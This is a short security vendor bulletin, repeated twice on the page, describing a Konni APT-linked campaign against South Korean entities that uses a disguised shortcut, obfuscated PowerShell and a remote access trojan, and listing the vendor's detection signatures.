Multi-Stage malware campaign targeting South Korean entities linked to Konni APT
Contents
Multi-Stage malware campaign targeting South Korean entities linked to Konni APT
April 29, 2025
A sophisticated multi-stage malware campaign potentially linked to the North Korean Konni APT group has been observed targeting entities primarily in South Korea. The attack begins with a ZIP file containing a disguised .lnk shortcut which executes an obfuscated PowerShell script designed to download and run additional malicious payloads. The final payload is a Remote Access Trojan (RAT) that establishes persistent access, collects system information and directory listings and exfiltrates the data to a compromised Command and Control (C2) server.
Symantec protects you from this threat, identified by the following:
Behavior-based
SONAR.Powershell!g20
SONAR.Powershell!g111
Carbon Black-based
Associated malicious indicators are blocked and detected by existing policies within VMware Carbon Black products. The recommended policy at a minimum is to block all types of malware from executing (Known, Suspect, and PUP) as well as delay execution for cloud scan to get maximum benefit …
April 29, 2025
A sophisticated multi-stage malware campaign potentially linked to the North Korean Konni APT group has been observed targeting entities primarily in South Korea. The attack begins with a ZIP file containing a disguised .lnk shortcut which executes an obfuscated PowerShell script designed to download and run additional malicious payloads. The final payload is a Remote Access Trojan (RAT) that establishes persistent access, collects system information and directory listings and exfiltrates the data to a compromised Command and Control (C2) server.
Symantec protects you from this threat, identified by the following:
Behavior-based
SONAR.Powershell!g20
SONAR.Powershell!g111
Carbon Black-based
Associated malicious indicators are blocked and detected by existing policies within VMware Carbon Black products. The recommended policy at a minimum is to block all types of malware from executing (Known, Suspect, and PUP) as well as delay execution for cloud scan to get maximum benefit …